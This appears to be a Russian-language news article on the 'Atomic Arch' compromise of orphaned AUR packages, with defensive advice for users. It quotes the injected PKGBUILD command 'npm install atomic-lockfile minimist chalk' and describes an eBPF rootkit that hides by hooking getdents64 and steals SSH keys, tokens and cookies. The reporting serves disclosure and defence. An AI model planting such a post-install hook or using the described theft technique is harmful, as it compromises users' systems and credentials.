В пользовательском репозитории Arch Linux (AUR) зафиксирована серьезная волна компрометации, получившая название Atomic Arch (идентификатор угрозы Sonatype-2026-003775, оценка 8,7 по шкале CVSS). Злоумышленники перехватывают контроль над «осиротевшими» пакетами (оставшимися без мейнтейнера) и внедряют вредоносный код в сборочные сценарии PKGBUILD.
На данный момент кампания затронула более 20 пакетов (включая популярный alvr). Официальные репозитории Arch Linux находятся в полной безопасности.
Механизм атаки и угроза ядра
Схема внедрения выглядит одинаково во всех зараженных пакетах:
- Захват пакета: Злоумышленники находят брошенные проекты в AUR, берут их под сопровождение, сохраняя историю и доверие пользователей.
- Внедрение в PKGBUILD: В сценарий сборки добавляется послеустановочная команда, вызывающая npm:Bashnpm install atomic-lockfile minimist chalk
*Примечание: Команда внедряется даже в те программы, которые вообще никак не связаны с экосистемой Node.js (как в случае с ALVR).*
3. **eBPF-руткит:** Внутри npm-пакета `atomic-lockfile` скрыт скомпилированный исполняемый файл для Linux. Он разворачивает полноценный руткит, использующий технологию **eBPF** (расширенный фильтр пакетов Беркли), выполняющуюся с максимальными привилегиями прямо внутри ядра Linux.
Руткит умеет перехватывать системный вызов `getdents64`, благодаря чему полностью скрывает свои процессы, файлы и сетевую активность от стандартных утилит мониторинга.
### Что пытается украсть вредонос?
Анализ кода выявил нацеленность на кражу конфиденциальных данных разработчиков и администраторов:
* Ключи SSH и учетные данные GitHub.
* Токены HashiCorp Vault.
* Базы cookie веб-браузеров.
* Токены и хранилища корпоративных мессенджеров: Slack, Discord, Microsoft Teams и Telegram.
Все собранные данные упаковываются в архивы и отправляются на удаленный сервер злоумышленников через POST-запросы (`/upload`). Кроме того, руткит защищен от отладки механизмами анти-трейсинга (`PTRACE_ATTACH` / `PTRACE_SEIZE`).
Как защитить свою систему?
Если вы недавно обновляли пакеты из AUR, простого удаления пакета может быть недостаточно — если скрипт успел отработать, система считается скомпрометированной.
Мейнтейнеры Arch Linux уже активно зачищают коммиты и блокируют учетные записи атакующих. Чтобы обезопасить себя при работе с AUR, придерживайтесь жестких правил:
Всегда проверяйте diff: Перед подтверждением сборки (`yay`, `paru` или вручную) внимательно просматривайте изменения в `PKGBUILD` и файлах `.install`.
Подозрительный NPM: Любое появление команд `npm install` или подтягивание зависимостей Node.js в пакетах, которым это не свойственно по логике, — стопроцентный маркер компрометации.
Контроль сирот: Обращайте особое внимание на статус пакета на сайте AUR. Если у него недавно сменился сопровождающий после долгого отсутствия активности, проверяйте коммиты с пристрастием.
Мы постараемся держать вас в курсе всех важнейших новостей мира Linux и свободного программного обеспечения. Оставайтесь с нами и подписывайтесь на наши обновления!